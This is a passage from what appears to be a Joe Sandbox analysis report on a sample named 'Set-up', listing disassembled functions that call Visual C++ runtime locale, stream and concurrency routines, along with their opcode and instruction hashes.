                                                                                                • Part of subcall function 6BC2490A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,6BC249A8,?,?,00000000,?,6BC29E20,?,?,?,?,?,00000018), ref: 6BC24915
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3std::locale::facet::_$??1_?getloc@ios_base@std@@?sgetc@?$basic_streambuf@_DecrefGetfacetIncrefLockitLockit::_Lockit@std@@MaklocchrMbrtowcU?$char_traits@_Vlocale@2@W@std@@@std@@std::_std::locale::_
                                                                                              • String ID: #$E$O$Q
                                                                                              • API String ID: 2720581600-3590659638
                                                                                              • Opcode ID: be0e932cfc1694e2d641a2ef238c500e98dd942e36438c754a9d80645f1d120e
                                                                                              • Instruction ID: 5c731aa94dc6adad191a43a8fce55f9e4ac8b511b197db62aa9981d281868c31
                                                                                              • Opcode Fuzzy Hash: be0e932cfc1694e2d641a2ef238c500e98dd942e36438c754a9d80645f1d120e
                                                                                              • Instruction Fuzzy Hash: 5961BF308241499BDF04DF64D881AEE77B4BF04314F04816AFD699B291EB7DDB54DBA0
                                                                                              Function 6BC2A2C6 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 173COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2A2CD
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000018), ref: 6BC2A2DB
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC1E444: __EH_prolog3.LIBCMT ref: 6BC1E44B
                                                                                                • Part of subcall function 6BC1E444: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EE77,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC1E455
                                                                                                • Part of subcall function 6BC1E444: int.LIBCPMT(00000000,00000014,6BC3EE77,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC1E46C
                                                                                                • Part of subcall function 6BC1E444: std::locale::_Getfacet.LIBCPMT ref: 6BC1E475
                                                                                                • Part of subcall function 6BC1E444: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EE77,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC1E4D5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC2A304
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                                • Part of subcall function 6BC2490A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,6BC249A8,?,?,00000000,?,6BC29E20,?,?,?,?,?,00000018), ref: 6BC24915
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3std::locale::facet::_$??1_?getloc@ios_base@std@@?sgetc@?$basic_streambuf@_DecrefGetfacetIncrefLockitLockit::_Lockit@std@@MaklocchrMbrtowcU?$char_traits@_Vlocale@2@W@std@@@std@@std::_std::locale::_
                                                                                              • String ID: #$E$O$Q
                                                                                              • API String ID: 2720581600-3590659638
                                                                                              • Opcode ID: 37a25d517f659dc06446cb6a621864f0700519d050ced617df75a22fd3d2cf40
                                                                                              • Instruction ID: 8958856a88c0bb682b8eef3941669380bfac5286eed8fdd0caa4a2adec6d9ca3
                                                                                              • Opcode Fuzzy Hash: 37a25d517f659dc06446cb6a621864f0700519d050ced617df75a22fd3d2cf40
                                                                                              • Instruction Fuzzy Hash: 42618C3082524AAFCF04DFA4D882AEE77B4BF44314F049159F9659B190EB3CEB54CB65
                                                                                              Function 6BC39326 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000,?,?), ref: 6BC39348
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC3935E
                                                                                              • setlocale.MSVCR100 ref: 6BC39374
                                                                                              • setlocale.MSVCR100 ref: 6BC3939B
                                                                                              • setlocale.MSVCR100 ref: 6BC393A8
                                                                                              • strcmp.MSVCR100 ref: 6BC393CF
                                                                                              • ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000,00000000), ref: 6BC393DE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: setlocale$??0exception@std@@??4?$_D@std@@ExceptionThrowV01@Yarn@strcmp
                                                                                              • String ID: ?
                                                                                              • API String ID: 3633093009-1684325040
                                                                                              • Opcode ID: 7937e213be6c6d172dbf14476bcd42d3098d598cfb7cbf061bff9bb9dcfa994b
                                                                                              • Instruction ID: a9d9c6ec9c33e647d0796ea176269e69a40d9330ea5bb36fe937d6f1e6e3ab68
                                                                                              • Opcode Fuzzy Hash: 7937e213be6c6d172dbf14476bcd42d3098d598cfb7cbf061bff9bb9dcfa994b
                                                                                              • Instruction Fuzzy Hash: EB21FFB29282197BDB409F65D88198A777CFFC6224B40416AE513D6181FFBCD744CB50
                                                                                              Function 6BC1AD39 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1AD40
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000020,6BC16B66,00000001), ref: 6BC1AD57
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC1AD6D
                                                                                              • ?Alloc@Concurrency@@YAPAXI@Z.MSVCR100(00000014,00000020,6BC16B66,00000001), ref: 6BC1AD74
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(00000028), ref: 6BC1AD94
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1ADBB
                                                                                              • ?wait@event@Concurrency@@QAEII@Z.MSVCR100(000000FF), ref: 6BC1ADCB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0exception@std@@??1_?wait@event@Alloc@ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 449592796-988830941
                                                                                              • Opcode ID: cafea936f849d98ce57117dc0632f10a1998fe1ecd102c8c2235d770a7e262b0
                                                                                              • Instruction ID: 42bd71ce2bcb91aeecba993e6cc7231800d815d62af944944c4567fec29a884a
                                                                                              • Opcode Fuzzy Hash: cafea936f849d98ce57117dc0632f10a1998fe1ecd102c8c2235d770a7e262b0
                                                                                              • Instruction Fuzzy Hash: 84119D719106059BCB04DFA8C849ACEF7B4BF9A361B50822AE566E7190EB38D705DB60
                                                                                              Function 6BC31DF6 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 496COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC31DFD
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000006C,6BC358E5,?,?,?,00000000,?,?,00000060,6BC385E1,?,?,?,?,?), ref: 6BC31E1E
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A8AF: __EH_prolog3.LIBCMT ref: 6BC2A8B6
                                                                                                • Part of subcall function 6BC2A8AF: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8C0
                                                                                                • Part of subcall function 6BC2A8AF: int.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8D7
                                                                                                • Part of subcall function 6BC2A8AF: std::locale::_Getfacet.LIBCPMT ref: 6BC2A8E0
                                                                                                • Part of subcall function 6BC2A8AF: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A940
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?_Hexdig@?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHDDDD@Z.MSVCP100(?,?,00000030,00000061,00000041,?,?,?,00000000,0000006C,6BC358E5,?,?,?,00000000,?), ref: 6BC3210A
                                                                                              • localeconv.MSVCR100 ref: 6BC321A4
                                                                                              • ?_Hexdig@?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHDDDD@Z.MSVCP100(?,00000030,00000030,00000061,00000041,?,?,?), ref: 6BC32227
                                                                                              • ?_Hexdig@?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHDDDD@Z.MSVCP100(?,?,00000030,00000061,00000041,?,?,?,?,?,?), ref: 6BC31FAE
                                                                                                • Part of subcall function 6BC248B1: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,6BC24964,?,?,00000000,?,6BC29830,?,?,?,?,?,00000014), ref: 6BC248BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$D@std@@@std@@@std@@Hexdig@?$num_get@V?$istreambuf_iterator@$std::locale::facet::_$??1_?getloc@ios_base@std@@?sgetc@?$basic_streambuf@D@std@@@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Vlocale@2@localeconvstd::_std::locale::_
                                                                                              • String ID: $
                                                                                              • API String ID: 1717552424-3993045852
                                                                                              • Opcode ID: 1c0915f72f4824ad39b241f1edab0947a8f98ea8ba11bdc1e11d6b46d9c04789
                                                                                              • Instruction ID: 1494be1bbbb2a9391dd38488dbc28ab44f94c13da3597da40a6f7b36e377fa22
                                                                                              • Opcode Fuzzy Hash: 1c0915f72f4824ad39b241f1edab0947a8f98ea8ba11bdc1e11d6b46d9c04789
                                                                                              • Instruction Fuzzy Hash: C712C630D297E89FEF128BB4846079DBFB1AF02704F444099C5966F282E77D4B89C792
                                                                                              Function 6BC2FBF6 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 379COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?), ref: 6BC2FC73
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?,?,?,?,?), ref: 6BC2FE20
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 6BC2FF70
                                                                                                • Part of subcall function 6BC248B1: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,6BC24964,?,?,00000000,?,6BC29830,?,?,?,?,?,00000014), ref: 6BC248BC
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?), ref: 6BC2FC9E
                                                                                                • Part of subcall function 6BC29AC7: _Stolx.MSVCP100(?,?,0000000A,?,?,?,?), ref: 6BC29BEB
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?,?,?,?,?), ref: 6BC2FDFD
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?,?,?,?,?,?,?,?,?), ref: 6BC2FF98
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$V?$istreambuf_iterator@$D@std@@@2@0D@std@@@std@@@std@@Getint@?$time_get@$?sgetc@?$basic_streambuf@D@std@@@std@@Stolx
                                                                                              • String ID: 9
                                                                                              • API String ID: 2585351434-2366072709
                                                                                              • Opcode ID: e3fdeb82fc1ecb29c6515b9e7bb6cac3a580abbf051b0a3588acccb0559d6e71
                                                                                              • Instruction ID: 4a0f440ba6202f0c0b0d76d20cec41dc6da350e05f315b02a5fbf400d9c1ead3
                                                                                              • Opcode Fuzzy Hash: e3fdeb82fc1ecb29c6515b9e7bb6cac3a580abbf051b0a3588acccb0559d6e71
                                                                                              • Instruction Fuzzy Hash: 6AE19A7182428EEFEF12DF60C851ADE3BB9AF05318F008199FD1596192EB78DB24CB51
                                                                                              Function 6BC3BC67 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 153COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: tolower$_errnoisspacememchr
                                                                                              • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                              • API String ID: 2328037959-1956417402
                                                                                              • Opcode ID: 37434f7311a6a9eff108ff303afc9026ce885465ed8d9d3334e11551913ee37b
                                                                                              • Instruction ID: 4debcee8340cd7039080e240394d06c80dd01cd1d07c7f0a915a78e4207dc45f
                                                                                              • Opcode Fuzzy Hash: 37434f7311a6a9eff108ff303afc9026ce885465ed8d9d3334e11551913ee37b
                                                                                              • Instruction Fuzzy Hash: 3551E370929AA99FDB118F69D8803AE7BB4BF02700F94449AE890D7249E73CC741CB60
                                                                                              Function 6BC25BD7 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC25BEB
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • _Maklocbyte.LIBCPMT ref: 6BC25C31
                                                                                              • _Maklocbyte.LIBCPMT ref: 6BC25C68
                                                                                                • Part of subcall function 6BC24780: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,?,?,6BC25408), ref: 6BC24792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Maklocbyte$?sputc@?$basic_streambuf@_MaklocchrMbrtowcU?$char_traits@_W@std@@@std@@
                                                                                              • String ID: #$E$O$Q
                                                                                              • API String ID: 3359182016-3590659638
                                                                                              • Opcode ID: c7d66698a0f9b794a8166344d79fc8030f61c55d1b4ef51b9ed25f5c27a89c6d
                                                                                              • Instruction ID: 4d4a5d65a8a4e76200a13ef73713e2362f417352a1f613356f770033f92f76b9
                                                                                              • Opcode Fuzzy Hash: c7d66698a0f9b794a8166344d79fc8030f61c55d1b4ef51b9ed25f5c27a89c6d
                                                                                              • Instruction Fuzzy Hash: CE317E32915148AFCF00DF98D841AEEBBB9BF1C314F05818AFDA967250F738AA54DB54
                                                                                              Function 6BC1AF05 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1AF26
                                                                                              • _CxxThrowException.MSVCR100(6BC117B8,6BC4C848), ref: 6BC1AF3C
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1AF55
                                                                                              • ?_Xfunc@tr1@std@@YAXXZ.MSVCP100 ref: 6BC1AF79
                                                                                              • ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1AFC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$?set@event@Concurrency@@ExceptionThrowXfunc@tr1@std@@
                                                                                              • String ID: _PMessage$_PSource
                                                                                              • API String ID: 1750389936-3961265847
                                                                                              • Opcode ID: 50ee0778c5040a2a1f754d6b2c979c6359ed3286acd3ef76568470da487753e2
                                                                                              • Instruction ID: 4e5785b0a04795bb9e02e2370966ae01c92877a474a15159ff07297cf9e03191
                                                                                              • Opcode Fuzzy Hash: 50ee0778c5040a2a1f754d6b2c979c6359ed3286acd3ef76568470da487753e2
                                                                                              • Instruction Fuzzy Hash: C22194B5928205EFCB10DFA9C484A9AB7B8FF45350F408965F925EB240F738D749DB60
                                                                                              Function 6BC19B42 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19B49
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC19B5A
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC19B78
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C928), ref: 6BC19B8E
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19BC1
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19BD4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0bad_target@??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 467497307-988830941
                                                                                              • Opcode ID: 03d389b900c5799a10dc3c683f1eec2ea25734661dd8c91d16581157c8fcd443
                                                                                              • Instruction ID: d95d9c269e1d0d2b0aa404d480f732e2ae7326df2c72d94a645c6a287e921b80
                                                                                              • Opcode Fuzzy Hash: 03d389b900c5799a10dc3c683f1eec2ea25734661dd8c91d16581157c8fcd443
                                                                                              • Instruction Fuzzy Hash: BC118C35910208DBCB20CFA4C44AADDBBB0BF54321F408169E5A6A7290EB3CD746DF50
                                                                                              Function 6BC17EBF Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC17EC6
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC17ED7
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC17EF5
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C928), ref: 6BC17F0B
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC17F3E
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC17F51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0bad_target@??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 467497307-988830941
                                                                                              • Opcode ID: 75d1d9521782d6f19382b9a752027e4b1d7270d103cbc97ef44e4edb57d32c0a
                                                                                              • Instruction ID: 048c55868813d44658afe5fdf3e059ae21ce6f06dee30cabfc362e9d10cb20e4
                                                                                              • Opcode Fuzzy Hash: 75d1d9521782d6f19382b9a752027e4b1d7270d103cbc97ef44e4edb57d32c0a
                                                                                              • Instruction Fuzzy Hash: 8011BC31524208DBCB10CF64C44AADEBBB0BF14321F40816AE566E7650EB3CC745EB60
                                                                                              Function 6BC19AA8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19AAF
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC19AC0
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC19ADF
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC19AF5
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19B07
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19B2D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??1_$??0_??0exception@std@@ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 3660706833-988830941
                                                                                              • Opcode ID: 5da135693bb4a0c9870f6386fa477d9e1148ebed62223812c51432b77d5073db
                                                                                              • Instruction ID: 4c34a780b45aa1c24d498d5c97a525bdb29d2a520eeb846ec60b41b967961ed4
                                                                                              • Opcode Fuzzy Hash: 5da135693bb4a0c9870f6386fa477d9e1148ebed62223812c51432b77d5073db
